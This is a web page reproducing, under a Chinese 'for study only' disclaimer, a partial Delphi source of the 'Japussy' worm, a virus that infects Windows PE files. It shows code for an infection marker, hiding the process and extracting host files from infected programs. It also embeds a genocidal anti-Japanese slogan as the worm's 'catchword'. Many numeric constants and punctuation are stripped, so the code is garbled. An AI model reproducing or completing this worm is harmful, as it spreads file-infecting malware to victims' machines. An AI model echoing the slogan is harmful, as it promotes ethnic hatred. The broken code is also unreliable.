本文来自互联网仅供学习和研究使用后果自行负责造成的任何损失与本站无关特此声明 program Japussy; uses Windows SysUtils Classes Graphics ShellAPI{ Registry}; const HeaderSize = ; //病毒体的大小 IconOffset = $EB; //PE文件主图标的偏移量 //在我的Delphi SP上面编译得到的大小其它版本的Delphi可能不同 //查找的十六进制字符串可以找到主图标的偏移量 { HeaderSize = ; //Upx压缩过病毒体的大小 IconOffset = $BC; //Upx压缩过PE文件主图标的偏移量 //Upx W 用法: upx Japussyexe } IconSize = $E; //PE文件主图标的大小字节 IconTail = IconOffset + IconSize; //PE文件主图标的尾部 ID = $; //感染标记 //垃圾码以备写入 Catchword = If a race need to be killed out it must be Yamato + If a country need to be destroyed it must be Japan! + *** WJapussyWormA ***; {$R *RES} function RegisterServiceProcess(dwProcessID dwType: Integer): Integer; stdcall; external Kerneldll; //函数声明 var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; //日文操作系统标记 { 判断是否为Winx } function IsWinx: Boolean; var Ver: TOSVersionInfo; begin Result := False; VerdwOSVersionInfoSize := SizeOf(TOSVersionInfo); if not GetVersionEx(Ver) then Exit; if (VerdwPlatformID = VER_PLATFORM_WIN_WINDOWS) then //Winx Result := True; end; { 在流之间复制 } procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer); var sCurPos dCurPos: Integer; begin sCurPos := SrcPosition; dCurPos := DstPosition; SrcSeek(sStartPos ); DstSeek(dStartPos ); DstCopyFrom(Src Count); SrcSeek(sCurPos ); DstSeek(dCurPos ); end; { 将宿主文件从已感染的PE文件中分离出来以备使用 } procedure ExtractFile(FileName: string); var sStream dStream: TFileStream; begin try sStream := TFileStreamCreate(ParamStr() fmOpenRead or fmShareDenyNone); try dStream := TFileStreamCreate(FileName fmCreate); try sStreamSeek(HeaderSize ); //跳过头部的病毒部分 dStreamCopyFrom(sStream sStreamSize HeaderSize); finally dStreamFree; end; finally sStreamFree; end; except end; end; { 填充STARTUPINFO结构 } [] [] [] [] [] |